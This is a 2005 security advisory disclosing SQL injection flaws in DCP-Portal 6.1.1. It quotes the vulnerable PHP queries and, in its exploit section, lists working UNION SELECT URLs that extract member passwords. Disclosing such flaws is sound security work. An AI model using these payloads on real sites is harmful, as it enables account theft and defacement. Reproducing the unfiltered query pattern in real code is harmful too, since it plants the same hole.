Hackgen Security Advisory 2005.3

Type packetstorm
Reporter Exoduks
Modified 2005-02-25T00:00:00


' [hackgen-2005-#003] '  
' SQL injection bugs in DCP-Portal '  
Software: DCP-Portal <= 6.1.1  
Homepage: http://www.dcp-portal.org  
Author: "Exoduks" - HackGen Team  
Release Date: 16 March, 2005  
Website: www.hackgen.org  
Mail: exoduks [at] gmail . com  
0x01 - Affected software description:  
DCP-Portal is a content management system with advanced features like web   
based update, link, file, member management, poll, calendar, content informer,   
content sending by members etc. Features: Admin panel to manage the entire site;   
HTML editor to add news and content; Members can submit news and contents, and   
write reviews; Members can receive the added content in e-mail; Mailing list;   
Search engine; Content categories; FAQ; Easy setup; Multi-language support; Forum;   
Message system; member agenda; Ad management. Site design can be changed with just   
one template file, publish in homepage option, .txt file import for contents,   
featured module, works with register_globals=off..   
0x02 - Vulnerability Discription:  
Vulnerabilities exist in prety much all sql queries, some of them are in index.php  
and forums.php. There isn't eny filtering for input string in all $_GET and $_POST  
variables. So it is possible to input evil sql query that will give us for example   
hashed password of user we want. This bug is very critical because we can get and   
admin password. So some evil user deface portal, or delate all database. This can   
be exploited if magic_quotes_gpc is set to Off in php.ini   
0x03 - Vulnerability Code:  
Vulnerability code in index.php  
----- beging the code in index.php -----  
$result = mysql_query("SELECT * FROM $t_members WHERE uid = '".$_GET["uid"]."' AND hideinfo != '1' ORDER BY username");  
$sql = mysql_query("SELECT id, name, content FROM $t_faq WHERE cat_id = '".$_GET["lcat"]."' ORDER BY name");  
$sql = mysql_query("SELECT id, name FROM $t_links WHERE cat_id = '".$_GET["lcat"]."' ORDER BY name");  
$result = mysql_query("SELECT * FROM $t_docs WHERE cat_id = '".$_GET["dcat"]."' AND active = '1' ORDER BY date DESC");  
----- end of the code -----  
Vulnerability code in forums.php  
----- beging the code in forums.php -----  
$result = mysql_query("SELECT * FROM $t_forums WHERE fid = '".$_GET["bid"]."'");  
$result = mysql_query("SELECT * FROM $t_forum_msg WHERE tid = '".$_GET["mid"]."'");  
----- end of the code -----  
0x04 - How to fix this bug:  
Vendor has beed contacted and he we probably publish new version of portal so go to   
http://www.dcp-portal.org and look for new version.  
0x05 - Exploit:  
http://server.com/index.php?page=links&catid=1&lcat=-99%27 UNION SELECT null,password FROM   
dcp5_members WHERE username=%27[username]  
http://server.com/index.php?page=documents&doc=-99%27 UNION SELECT null,null,username,password,  
null,null,null,null,null,null,null,null FROM dcp5_members WHERE username=%27[username]  
http://server.com/index.php?page=mdetails&uid=-99%27 UNION SELECT null,null,null,username,null,  
null,null,null,password,null,null,null,null,null,null,null,null,null,null,null,null FROM dcp5_members   
WHERE username=%27[username]  
http://server.com/forums.php?action=showmsg&mid=-99%27 UNION SELECT null,null,null,password,null,  
username,null,null,null FROM dcp5_members WHERE username=%27[username]  
http://server.com/forums.php?action=board&bid=-99%27UNION SELECT null,null,password,null FROM   
dcp5_members WHERE username=%27[username]  
Replace [username] with username which you want to get password for and if you need change   
dcp5_ prefix. I have tested this on DCP-Portal v6.1.1 and it works !  
0x006 - The End:  
And you have come to end. My threed advisor is out.   
Grejtttzz to: All people who are working on phearless zine which can be readed on  
Written By Exoduks - www.hackgen.org